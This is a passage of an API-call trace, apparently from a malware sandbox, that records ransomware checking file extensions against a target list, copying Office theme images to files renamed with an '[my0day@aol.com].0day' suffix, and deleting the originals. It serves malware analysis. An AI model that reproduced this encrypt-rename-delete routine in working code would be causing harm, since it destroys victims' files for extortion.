(lpString1=".docx", lpString2="L.PNG") returned -1 [0045.972] lstrlenW (lpString=".pdf") returned 4 [0045.972] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.972] lstrlenW (lpString=".xls") returned 4 [0045.972] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.972] lstrlenW (lpString=".xlsx") returned 5 [0045.972] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.973] lstrlenW (lpString=".ppt") returned 4 [0045.973] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.973] lstrlenW (lpString=".zip") returned 4 [0045.973] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.973] lstrlenW (lpString=".rar") returned 4 [0045.973] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.973] lstrlenW (lpString=".bz2") returned 4 [0045.973] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.973] lstrlenW (lpString=".7z") returned 3 [0045.973] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.973] lstrlenW (lpString=".dbf") returned 4 [0045.973] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.973] lstrlenW (lpString=".1cd") returned 4 [0045.973] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.973] lstrlenW (lpString=".jpg") returned 4 [0045.973] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.973] lstrlenW (lpString=".doc") returned 4 [0045.973] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.973] lstrlenW (lpString=".docx") returned 5 [0045.973] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.973] lstrlenW (lpString=".pdf") returned 4 [0045.973] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.973] lstrlenW (lpString=".xls") returned 4 [0045.973] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.973] lstrlenW (lpString=".xlsx") returned 5 [0045.973] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.973] lstrlenW (lpString=".ppt") returned 4 [0045.974] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.974] lstrlenW (lpString=".zip") returned 4 [0045.974] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.974] lstrlenW (lpString=".rar") returned 4 [0045.974] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.974] lstrlenW (lpString=".bz2") returned 4 [0045.974] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.974] lstrlenW (lpString=".7z") returned 3 [0045.974] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.974] lstrlenW (lpString=".dbf") returned 4 [0045.974] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.974] lstrlenW (lpString=".1cd") returned 4 [0045.974] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.974] lstrlenW (lpString=".jpg") returned 4 [0045.974] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.974] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0045.974] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.975] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1232) returned 1 [0045.975] CloseHandle (hObject=0x1d8) returned 1 [0045.975] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 0x20 [0045.975] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.975] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.975] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.975] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.975] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0046.235] GetLastError () returned 0x0 [0046.235] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x4d0, lpOverlapped=0x0) returned 1 [0046.237] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x4e0, lpOverlapped=0x0) returned 1 [0046.238] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.238] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.238] SetEndOfFile (hFile=0x188) returned 1 [0046.238] CloseHandle (hObject=0x188) returned 1 [0046.238] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.238] SetEndOfFile (hFile=0x1d8) returned 1 [0046.239] CloseHandle (hObject=0x1d8) returned 1 [0046.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.239] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 1 [0046.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.240] lstrlenW (lpString=".doc") returned 4 [0046.240] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.240] lstrlenW (lpString=".docx") returned 5 [0046.240] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.240] lstrlenW (lpString=".pdf") returned 4 [0046.240] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.240] lstrlenW (lpString=".xls") returned 4 [0046.240] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.240] lstrlenW (lpString=".xlsx") returned 5 [0046.240] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.240] lstrlenW (lpString=".ppt") returned 4 [0046.240] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.240] lstrlenW (lpString=".zip") returned 4 [0046.240] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.240] lstrlenW (lpString=".rar") returned 4 [0046.240] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.240] lstrlenW (lpString=".bz2") returned 4 [0046.240] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.240] lstrlenW (lpString=".7z") returned 3 [0046.240] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.240] lstrlenW (lpString=".dbf") returned 4 [0046.240] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.240] lstrlenW (lpString=".1cd") returned 4 [0046.240] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.240] lstrlenW (lpString=".jpg") returned 4 [0046.240] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.241] lstrlenW (lpString=".doc") returned 4 [0046.241] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.241] lstrlenW (lpString=".docx") returned 5 [0046.241] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.241] lstrlenW (lpString=".pdf") returned 4 [0046.241] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.241] lstrlenW (lpString=".xls") returned 4 [0046.241] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.241] lstrlenW (lpString=".xlsx") returned 5 [0046.241] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.241] lstrlenW (lpString=".ppt") returned 4 [0046.241] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.241] lstrlenW (lpString=".zip") returned 4 [0046.241] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.241] lstrlenW (lpString=".rar") returned 4 [0046.241] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.241] lstrlenW (lpString=".bz2") returned 4 [0046.241] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.241] lstrlenW (lpString=".7z") returned 3 [0046.241] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.241] lstrlenW (lpString=".dbf") returned 4 [0046.241] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.241] lstrlenW (lpString=".1cd") returned 4 [0046.241] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.241] lstrlenW (lpString=".jpg") returned 4 [0046.241] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.241] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.242] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.242] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.242] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=2574) returned 1 [0046.242] CloseHandle (hObject=0x1d8) returned 1 [0046.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 0x20 [0046.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.242] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.242] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.242] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.242] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.244] GetLastError () returned 0x0 [0046.244] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xa0e, lpOverlapped=0x0) returned 1 [0046.245] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xa10, lpOverlapped=0x0) returned 1 [0046.246] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.246] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.246] SetEndOfFile (hFile=0x198) returned 1 [0046.246] CloseHandle (hObject=0x198) returned 1 [0046.246] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.247] SetEndOfFile (hFile=0x1d8) returned 1 [0046.247] CloseHandle (hObject=0x1d8) returned 1 [0046.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.248] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 1 [0046.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.248] lstrlenW (lpString=".doc") returned 4 [0046.248] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.248] lstrlenW (lpString=".docx") returned 5 [0046.248] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.248] lstrlenW (lpString=".pdf") returned 4 [0046.248] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.248] lstrlenW (lpString=".xls") returned 4 [0046.248] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.248] lstrlenW (lpString=".xlsx") returned 5 [0046.248] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.248] lstrlenW (lpString=".ppt") returned 4 [0046.248] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.248] lstrlenW (lpString=".zip") returned 4 [0046.248] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.248] lstrlenW (lpString=".rar") returned 4 [0046.248] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.248] lstrlenW (lpString=".bz2") returned 4 [0046.248] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.248] lstrlenW (lpString=".7z") returned 3 [0046.248] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.248] lstrlenW (lpString=".dbf") returned 4 [0046.248] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.248] lstrlenW (lpString=".1cd") returned 4 [0046.249] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.249] lstrlenW (lpString=".jpg") returned 4 [0046.249] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.249] lstrlenW (lpString=".doc") returned 4 [0046.249] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.249] lstrlenW (lpString=".docx") returned 5 [0046.249] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.249] lstrlenW (lpString=".pdf") returned 4 [0046.249] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.249] lstrlenW (lpString=".xls") returned 4 [0046.249] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.249] lstrlenW (lpString=".xlsx") returned 5 [0046.249] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.249] lstrlenW (lpString=".ppt") returned 4 [0046.249] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.249] lstrlenW (lpString=".zip") returned 4 [0046.249] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.249] lstrlenW (lpString=".rar") returned 4 [0046.249] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.249] lstrlenW (lpString=".bz2") returned 4 [0046.249] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.249] lstrlenW (lpString=".7z") returned 3 [0046.249] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.249] lstrlenW (lpString=".dbf") returned 4 [0046.249] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.249] lstrlenW (lpString=".1cd") returned 4 [0046.249] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0046.250] lstrlenW (lpString=".jpg") returned 4 [0046.250] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.250] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0046.250] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.250] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=37440) returned 1 [0046.250] CloseHandle (hObject=0x1d8) returned 1 [0046.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 0x20 [0046.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.250] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.250] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.251] GetLastError () returned 0x0 [0046.251] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x9240, lpOverlapped=0x0) returned 1 [0046.254] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x9250, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x9250, lpOverlapped=0x0) returned 1 [0046.255] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.255] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.255] SetEndOfFile (hFile=0x198) returned 1 [0046.256] CloseHandle (hObject=0x198) returned 1 [0046.256] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.256] SetEndOfFile (hFile=0x1d8) returned 1 [0046.257] CloseHandle (hObject=0x1d8) returned 1 [0046.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.257] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 1 [0046.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0046.257] lstrlenW (lpString=".doc") returned 4 [0046.257] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.257] lstrlenW (lpString=".docx") returned 5 